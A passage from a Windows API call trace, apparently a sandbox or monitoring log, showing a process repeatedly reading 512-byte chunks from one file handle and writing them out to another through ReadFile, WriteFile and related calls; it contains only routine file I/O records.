_get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.936] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, 
lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.937] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: 
hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.938] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.939] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, 
lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.940] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] GetFileType (hFile=0x50) returned 0x1 [0128.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.940] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 
0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) 
returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] GetFileType (hFile=0x50) returned 0x1 [0128.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.941] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.942] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] GetFileType (hFile=0x50) returned 0x1 [0128.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.943] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.943] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.943] ReadFile 
